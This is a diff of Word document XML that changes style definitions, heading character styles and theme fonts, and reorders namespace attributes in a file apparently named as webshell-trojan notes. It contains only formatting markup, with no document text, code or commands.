+    <w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
+    <w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:uiPriority="37"/>
+    <w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
   </w:latentStyles>
   <w:style w:type="paragraph" w:default="1" w:styleId="a">
     <w:name w:val="Normal"/>
     <w:qFormat/>
-    <w:rsid w:val="006F41E8"/>
+    <w:rsid w:val="00CF1BA9"/>
     <w:rPr>
       <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft YaHei" w:hAnsi="Times New Roman"/>
     </w:rPr>
@@ -2945,7 +4342,7 @@
     <w:name w:val="heading 1"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="10"/>
+    <w:link w:val="1Char"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
@@ -2954,7 +4351,7 @@
       <w:keepNext/>
       <w:keepLines/>
       <w:widowControl w:val="0"/>
-      <w:spacing w:beforeLines="0" w:before="120" w:afterLines="0" w:after="120" w:line="300" w:lineRule="auto"/>
+      <w:spacing w:beforeLines="0" w:afterLines="0" w:line="300" w:lineRule="auto"/>
       <w:outlineLvl w:val="0"/>
     </w:pPr>
     <w:rPr>
@@ -2970,7 +4367,7 @@
     <w:name w:val="heading 2"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="20"/>
+    <w:link w:val="2Char"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
@@ -2994,7 +4391,7 @@
   <w:style w:type="paragraph" w:styleId="3">
     <w:name w:val="heading 3"/>
     <w:basedOn w:val="a"/>
-    <w:link w:val="30"/>
+    <w:link w:val="3Char"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="9"/>
     <w:qFormat/>
@@ -3016,7 +4413,7 @@
     <w:name w:val="heading 4"/>
     <w:basedOn w:val="a"/>
     <w:next w:val="a"/>
-    <w:link w:val="40"/>
+    <w:link w:val="4Char"/>
     <w:autoRedefine/>
     <w:uiPriority w:val="9"/>
     <w:unhideWhenUsed/>
@@ -3048,6 +4445,7 @@
     <w:uiPriority w:val="99"/>
     <w:semiHidden/>
     <w:unhideWhenUsed/>
+    <w:qFormat/>
     <w:tblPr>
       <w:tblInd w:w="0" w:type="dxa"/>
       <w:tblCellMar>
@@ -3089,7 +4487,7 @@
     <w:qFormat/>
     <w:rsid w:val="00583618"/>
     <w:pPr>
-      <w:spacing w:before="50" w:after="50" w:line="300" w:lineRule="auto"/>
+      <w:spacing w:line="300" w:lineRule="auto"/>
       <w:ind w:firstLineChars="200" w:firstLine="200"/>
     </w:pPr>
     <w:rPr>
@@ -3106,8 +4504,8 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="10">
-    <w:name w:val="标题 1 字符"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="1Char">
+    <w:name w:val="标题 1 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="1"/>
     <w:uiPriority w:val="9"/>
@@ -3121,8 +4519,8 @@
       <w:szCs w:val="44"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="30">
-    <w:name w:val="标题 3 字符"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="3Char">
+    <w:name w:val="标题 3 Char"/>
     <w:link w:val="3"/>
     <w:uiPriority w:val="9"/>
     <w:rsid w:val="00B30BEC"/>
@@ -3134,8 +4532,8 @@
       <w:szCs w:val="27"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="40">
-    <w:name w:val="标题 4 字符"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="4Char">
+    <w:name w:val="标题 4 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="4"/>
     <w:uiPriority w:val="9"/>
@@ -3148,8 +4546,8 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:customStyle="1" w:styleId="20">
-    <w:name w:val="标题 2 字符"/>
+  <w:style w:type="character" w:customStyle="1" w:styleId="2Char">
+    <w:name w:val="标题 2 Char"/>
     <w:basedOn w:val="a0"/>
     <w:link w:val="2"/>
     <w:uiPriority w:val="9"/>
@@ -3160,6 +4558,129 @@
       <w:bCs/>
       <w:sz w:val="36"/>
       <w:szCs w:val="32"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a5">
+    <w:name w:val="Balloon Text"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char0"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
+    <w:name w:val="批注框文本 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a5"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft YaHei" w:hAnsi="Times New Roman"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a6">
+    <w:name w:val="header"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char1"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:pPr>
+      <w:pBdr>
+        <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
+      </w:pBdr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+      <w:jc w:val="center"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char1">
+    <w:name w:val="页眉 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a6"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft YaHei" w:hAnsi="Times New Roman"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a7">
+    <w:name w:val="footer"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char2"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:pPr>
+      <w:tabs>
+        <w:tab w:val="center" w:pos="4153"/>
+        <w:tab w:val="right" w:pos="8306"/>
+      </w:tabs>
+      <w:snapToGrid w:val="0"/>
+    </w:pPr>
+    <w:rPr>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char2">
+    <w:name w:val="页脚 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a7"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Microsoft YaHei" w:hAnsi="Times New Roman"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="paragraph" w:styleId="a8">
+    <w:name w:val="Document Map"/>
+    <w:basedOn w:val="a"/>
+    <w:link w:val="Char3"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:rPr>
+      <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="Char3">
+    <w:name w:val="文档结构图 Char"/>
+    <w:basedOn w:val="a0"/>
+    <w:link w:val="a8"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:rsid w:val="00CF1BA9"/>
+    <w:rPr>
+      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="Times New Roman"/>
+      <w:sz w:val="18"/>
+      <w:szCs w:val="18"/>
     </w:rPr>
   </w:style>
 </w:styles>
@@ -3208,7 +4729,7 @@
     </a:clrScheme>
     <a:fontScheme name="Office">
       <a:majorFont>
-        <a:latin typeface="Calibri Light" panose="020F0302020204030204"/>
+        <a:latin typeface="Calibri Light"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
         <a:font script="Jpan" typeface="游ゴシック Light"/>
@@ -3243,7 +4764,7 @@
         <a:font script="Geor" typeface="Sylfaen"/>
       </a:majorFont>
       <a:minorFont>
-        <a:latin typeface="Calibri" panose="020F0502020204030204"/>
+        <a:latin typeface="Calibri"/>
         <a:ea typeface=""/>
         <a:cs typeface=""/>
         <a:font script="Jpan" typeface="游明朝"/>
@@ -3420,7 +4941,7 @@
   <a:extraClrSchemeLst/>
   <a:extLst>
     <a:ext uri="{05A4C25C-085E-4340-85A3-A5531E510DB2}">
-      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" name="Office Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
+      <thm15:themeFamily xmlns:thm15="http://schemas.microsoft.com/office/thememl/2012/main" xmlns="" name="Office Theme" id="{62F939B6-93AF-4DB8-9C6B-D6C7DFDC589F}" vid="{4A3C46E8-61CC-4603-A589-7422A47A8E4A}"/>
     </a:ext>
   </a:extLst>
 </a:theme>

--- a/web/trojan/webshell木马.docx
+++ b/web/trojan/webshell木马.docx
@@ -468,7 +468,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
+                        <a14:shadowObscured xmlns="" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -580,7 +580,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
+                        <a14:shadowObscured xmlns="" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -643,7 +643,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
+                        <a14:shadowObscured xmlns="" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -707,7 +707,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
+                        <a14:shadowObscured xmlns="" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -1417,7 +1417,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
+                        <a14:shadowObscured xmlns="" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -1480,7 +1480,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
+                        <a14:shadowObscured xmlns="" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                       </a:ext>
                     </a:extLst>
                   </pic:spPr>
@@ -1896,9 +1896,6 @@
       <w:pPr>
         <w:pStyle w:val="4"/>
         <w:spacing w:before="156" w:after="156"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -2177,7 +2174,7 @@
                     </a:ln>
                     <a:extLst>
                       <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
-                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns=""/>
